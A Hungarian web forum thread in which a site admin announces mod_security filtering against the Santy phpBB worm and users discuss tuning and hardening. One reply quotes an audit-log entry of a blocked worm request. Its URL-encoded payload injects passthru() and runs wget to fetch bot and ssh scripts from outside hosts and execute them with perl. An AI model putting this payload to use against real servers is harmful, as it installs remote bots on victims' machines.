Újabb megszorítások a HUP-on

Címkék

Ha nem tudsz üzenetet, hozzászólást küldeni a HUP fórumba vagy a cikkekhez, akkor feltétlenül olvasd el ezt az írást!

A karácsony előtt kitört járvány miatt banlistet vezettem be HUP-on. Mivel azonban az User Agent-re való match-elés nem életbiztosítás, a szerveren alkalmazásra került a banlist mellett a mod_security névre hallgató ``Apache Web Intrusion Detection And Prevention'' modul is. Nem véletlenül. Alig egy óra alatt fél megabyte-os lett a modul által generált audit_log file.


A modul lényege, hogy ellentétben a .htaccess + mod_rewrite comboval, nem csak a GET kéréseket tudja értelmezni, hanem a POST-okat is. Aki egy kicsit is ért a támadásokhoz, az nem GET-ként küldi azokat, hanem POST-ként, mert a POST-okat a legtöbb modul nem értelmezi.

A mod_security kicsit paranoiásan lett beállítva, így előfordulhat, hogy egyes hozzászólások, postok, üzenetek akkor is fennakadnak, ha azok alapjában véve nem rossz szándékúak (false positive). Ez abból derül ki, hogy ezt az oldalt látod. Eddig összesen három false positive-nak látszó post került elutasításra a szerver által. Hogy tökéletesíteni lehessen a szűrést, szükség van visszajelzésekre (tesztelni lehet a fórumban itt).

Ha ilyet tapasztalsz, akkor kérlek írj a trey () hup ! hu email címre. A leveledben legyen benne a beküldeni kívánt üzenet!

Köszönöm!

Hozzászólások

Na ugy latszik en nem akadtam fenn ha ez elment ;)

Reggen en mar neztem egyszer, de akkor "szemmel lathatoan" visszafogta a teljesitmenyet a webservernek ... trey, mik a mostani tapasztalataid, nem jelent jelentosebb overheadet a hasznalata

(sebesseben es/vagy pl memoriahasznalatban)?

Allitolag 10% korul van sebessegben ha a

SecFilterEngine On

beallitas van. Hasznalhatsz helyette

SecFilterEngine DinamicOnly

SecAuditEngine RelevantOnly

beallitast is. A debugot nyilvan ki kell kapcsolni, mert a diszk IO (log iras) a leglassabb. Amugy nem vettem eszre nagy valtozast. Memoriaban semmit, CPU-ban sem latszik semmi kiugro.

Erdemes elolvasni a szerzo cikket az OnLamp-on itt.

Ja a Santy.A, Santy.B, stb. probalkozasokat szepen megfogja. Ez viszi el a legtobbet jelenleg + a referer spammelok.

Percenkent 20-30 van beloluk.

=======================================

UNIQUE_ID: PmcIEcCoAgQAAApNKfkAAAAR

Request: 81.*.*.* - - [28/Dec/2004:17:07:03 +0100] "GET /modules.php?name=Forums&rush=%65%63%68%6F%20%

5F%53%54%41%52%54%5F%3B%20killall%20-9%20perl;

cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20

http://www.abcft.org/themes/bot.htm;wget%20http://http://

weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20

ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%

68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%

61%73%73%74%68%72%75%28%24%48%54%54%50%

5F%47%45%54%5F%56%41%52%53%5B%72%75%73%

68%5D%29.%2527'; HTTP/1.1" 403 1024

Handler: (null)

----------------------------------------

GET /modules.php?name=Forums&rush=%65%63%68%6F%20%

5F%53%54%41%52%54%5F%3B%20killall%20-9%20perl;

cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20

http://www.abcft.org/themes/bot.htm;wget%20http://

http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm

%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%

63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%

70%61%73%73%74%68%72%75%28%24%48%54%54%

50%5F%47%45%54%5F%56%41%52%53%5B%72%75%

73%68%5D%29.%2527'; HTTP/1.1

Connection: close

Host: www.hup.hu

User-Agent: LWP::Simple/5.69

mod_security-message: Access denied with code 403. Pattern match "%27" at CUSTOM

mod_security-action: 403

HTTP/1.1 403 Forbidden

Last-Modified: Sun, 26 Dec 2004 13:49:42 GMT

ETag: "50840-400-177ac980"

Accept-Ranges: bytes

Content-Length: 1024

Connection: close

Content-Type: text/html; charset=ISO-8859-2

Van mit tanulni trey mestertől... :) A fenébe is, miért nem ilyen dolgokkal foglalkozom munkaidőben, miért nem kerülök én is közel az ilyen tűzhöz... Na mindegy, bocs, csak tesztelek :)

Trey!

Az apache ide vontakozo beallitasokat megosztod velunk (gyk: reszlet copy-paste ;-)

Kosz,

Elbandi

ezen en is gondolkodtam, hogy kerjem-e vagy sem... de most modemmel vagyok es ejjel 2 korul nincs kedvem/idom szetturni a netet hogy megtanuljam a mod_security-t.

Masik meg, hogy egy mukodo peldabol konnyebb tanulni, minthogy valamit osszeganyolok, es azon izgulok, hogy nem b*tam el semmit, es nem k*rjak fel a forumom...

Trey irj egy privatot lenne paar dolog amit tudnek javasolni...

De csak ha erdekel... tudok segiteni ez ugyben...

A Santy ellen az alap configon kivul ennyi kell neked:

http://www.modsecurity.org/blog/archives/000046.html

Tokeletesen mukodik. Ami meg hasznos:

noexec mountolod a /tmp-t, chmod 550 a wget-re, szurod a lwp trivial, LWP::Simple HTTP_USER_AGENT-eket, sot en lehet h tovabbmegyek, es megkovetelem az HTTP_USER_AGENT megletet. Ez utobbival az a baj, hogy nehany newsfeed reader nem kuld semmit, igy azok kimaradnak a jatekbol.

A tobbi, szemelyreszolo beallitast neked kell kikiserletezni, mert en nem tudhatom, hogy kit-mit akarsz meg szurni. Ez olyan mint a spam. En szurom a referer spammeloket is...

Ja es ha a PHP verziod 4.3.10 es a phpBB-det mar joelore megpatchelted ( javitas itt [www.phpbb.com]), akkor tulajdonkeppen ezek mar csak plusz biztositekok, mert a worm ugysem arthat.

Hehe trey, ha tényleg csak 3 false positive volt, az mind3 én voltam... pedig csak egy sima url volt a hozzászólásomban. Még akartam is írni levelet emiatt, de aztán láttam, másoknak megy a post, gondoltam biztos vmi pillanatnyi elmezavar, és nem akartalak zavarni... :)